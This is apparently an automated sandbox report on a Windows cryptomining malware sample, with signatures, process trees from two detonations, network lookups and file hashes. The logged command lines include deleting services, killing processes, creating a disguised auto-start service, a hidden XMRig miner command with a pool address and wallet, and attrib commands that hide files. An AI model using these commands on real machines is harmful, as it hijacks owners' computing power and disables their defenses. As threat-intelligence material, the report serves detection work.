Analysis Overview
SHA256
1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
Threat Level: Known bad
The file 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Sets file to hidden
Creates new service(s)
Stops running service(s)
Loads dropped DLL
VMProtect packed file
Executes dropped EXE
Checks computer location settings
Deletes itself
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Runs net.exe
Kills process with taskkill
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported
2024-05-20 10:26
Signatures
Unsigned PE
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 10:26
Reported
2024-05-20 10:28
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
xmrig
XMRig Miner payload
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe (4 identical events) | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
| N/A | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
VMProtect packed file
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe (8 identical events) | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe (15 identical events) | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe (15 identical events) | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe (4 identical events) | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete Systemss
C:\Windows\SysWOW64\sc.exe
sc delete WMIserver
C:\Windows\SysWOW64\sc.exe
sc delete WMIservers
C:\Windows\SysWOW64\sc.exe
sc delete WMI
C:\Windows\SysWOW64\sc.exe
sc delete Serv
C:\Windows\SysWOW64\sc.exe
sc delete system_update
C:\Windows\SysWOW64\sc.exe
sc delete system_updatea
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolsvs.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuapl.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSASCui.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nheqminer_zcash.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nssm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im update.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im server.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sppscv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\net.exe
net stop wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wkde
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\sc.exe
sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
C:\Windows\SysWOW64\net.exe
net start wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start wkde
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\svchost.exe
C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
Network
Files
C:\WINDOWS\Debug\wkde\wk.bat
| MD5 | 816d97b2dca2af96209ef913291d59be |
| SHA1 | a3c480a7e333a1623e7cd8194d68468397c3f6d1 |
| SHA256 | ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d |
| SHA512 | 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088 |
C:\Windows\debug\wkde\mscorsvw.exe
| MD5 | cbb4ca806e69a4880dd02e04e5bce18b |
| SHA1 | 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7 |
| SHA256 | 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b |
| SHA512 | 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6 |
C:\WINDOWS\Debug\wkde\mscorsvw.ini
| MD5 | d298cd48c88433017ef4e66af740830e |
| SHA1 | e0ef455dc4df16948d85c5a058d0980ce5020822 |
| SHA256 | b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89 |
| SHA512 | 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe |
C:\Windows\debug\wkde\svchost.exe
| MD5 | 79a1ec8d32e8e3032b5f5126c11f2216 |
| SHA1 | 86dc55fcdc358a5c6699c41582b66b75bedc4086 |
| SHA256 | d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8 |
| SHA512 | a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106 |
C:\WINDOWS\Debug\wkde\mscorsvw.log
| MD5 | 0a98d172405546d83c748505a590f268 |
| SHA1 | 0a107d99277cc976260d59d60ea2e513a5280688 |
| SHA256 | cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac |
| SHA512 | 89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 10:26
Reported
2024-05-20 10:28
Platform
win7-20240220-en
Max time kernel
148s
Max time network
121s
Command Line
Signatures
xmrig
XMRig Miner payload
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe (4 identical events) | N/A |
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
| N/A | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
VMProtect packed file
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe (8 identical events) | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe (15 identical events) | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe (15 identical events) | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe (4 identical events) | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete Systemss
C:\Windows\SysWOW64\sc.exe
sc delete WMIserver
C:\Windows\SysWOW64\sc.exe
sc delete WMIservers
C:\Windows\SysWOW64\sc.exe
sc delete WMI
C:\Windows\SysWOW64\sc.exe
sc delete Serv
C:\Windows\SysWOW64\sc.exe
sc delete system_update
C:\Windows\SysWOW64\sc.exe
sc delete system_updatea
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolsvs.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuapl.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSASCui.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nheqminer_zcash.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nssm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im update.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im server.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sppscv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\net.exe
net stop wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wkde
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\sc.exe
sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
C:\Windows\SysWOW64\net.exe
net start wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start wkde
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\svchost.exe
C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
C:\Windows\debug\wkde\wk.bat
| MD5 | 816d97b2dca2af96209ef913291d59be |
| SHA1 | a3c480a7e333a1623e7cd8194d68468397c3f6d1 |
| SHA256 | ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d |
| SHA512 | 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088 |
C:\Windows\debug\wkde\mscorsvw.exe
| MD5 | cbb4ca806e69a4880dd02e04e5bce18b |
| SHA1 | 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7 |
| SHA256 | 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b |
| SHA512 | 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6 |
C:\WINDOWS\Debug\wkde\svchost.exe
| MD5 | 79a1ec8d32e8e3032b5f5126c11f2216 |
| SHA1 | 86dc55fcdc358a5c6699c41582b66b75bedc4086 |
| SHA256 | d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8 |
| SHA512 | a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106 |
C:\WINDOWS\Debug\wkde\mscorsvw.ini
| MD5 | d298cd48c88433017ef4e66af740830e |
| SHA1 | e0ef455dc4df16948d85c5a058d0980ce5020822 |
| SHA256 | b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89 |
| SHA512 | 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe |
C:\WINDOWS\Debug\wkde\mscorsvw.log
| MD5 | df296d0aa6eb740c57059aa9f47fd46c |
| SHA1 | de668e0436d036c2608b3a16fbfaaf3cbfd52a59 |
| SHA256 | 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a |
| SHA512 | db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5 |